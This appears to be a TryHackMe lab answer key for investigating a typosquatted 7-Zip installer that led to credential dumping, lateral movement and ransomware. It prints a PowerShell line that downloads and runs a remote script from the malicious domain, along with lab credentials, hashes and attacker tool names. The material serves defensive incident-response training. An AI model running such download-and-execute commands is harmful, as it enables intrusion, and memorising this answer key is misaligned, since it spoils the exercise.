
[THM] Hunt Me II: Typo Squatters

Just working on a typical day as a software engineer, Perry received an encrypted 7z archive from his boss containing a snippet of source code that must be completed within the day. Realising that his current workstation does not have an application that can unpack the file, he opens his browser and searches for software that can help him access the file. Without validating the resource, Perry immediately clicks the first search engine result and installs the application.


On September 26, 2023, one of the security analysts observed something unusual on the workstation owned by Perry, based on the generated endpoint and network logs. Given this, your SOC lead has assigned you to conduct an in-depth investigation of this workstation and assess the impact of the potential compromise.

Questions

Q: What is the URL of the malicious software that was downloaded by the victim user?
A: http://www.7zipp.org/a/7z2301-x64.msi


Q: What is the IP address of the domain hosting the malware?
A: 206.189.34.218


Q: What is the PID of the process that executed the malicious software?
A: 2532


Q: Following the execution chain of the malicious payload, another remote file was downloaded and executed. What is the full command line value of this suspicious activity?
A: powershell.exe iex(iwr http://www.7zipp.org/a/7z.ps1 -useb)


Q: The newly downloaded script also installed the legitimate version of the application. What is the full file path of the legitimate installer?
A: C:\Windows\Temp\7zlegit.exe


Q: What is the name of the service that was installed?
A: 7zService


Q: The attacker was able to establish a C2 connection after starting the implanted service. What is the username of the account that executed the service?
A: SYSTEM


Q: After dumping LSASS data, the attacker attempted to parse the data to harvest the credentials. What is the name of the tool used by the attacker in this activity?
A: Invoke-PowerExtract


Q: What is the credential pair that the attacker leveraged after the credential dumping activity? (format: username:hash)
A: james.cromwell:B852A0B8BD4E00564128E0A5EA2BC4CF


Q: After gaining access to the new account, the attacker attempted to reset the credentials of another user. What is the new password set to this target account?
A: pwn3dpw!!!


Q: What is the name of the workstation where the new account was used?
A: WKSTN-02


Q: After gaining access to the new workstation, a new set of credentials was discovered. What is the username, including its domain, and password of this new account?
A: SSF\itadmin:NoO6@39Sk0!


Q: Aside from mimikatz, what is the name of the PowerShell script used to dump the hash of the domain admin?
A: Invoke-SharpKatz.ps1


Q: What is the AES256 hash of the domain admin based on the credential dumping output?
A: f28a16b8d3f5163cb7a7f7ed2c8f2cf0419f0b0c2e28c15f831d050f5edaa534


Q: After gaining domain admin access, the attacker popped ransomware on workstations. How many files were encrypted on all workstations?
A: 46

This post is licensed under CC BY 4.0 by the author.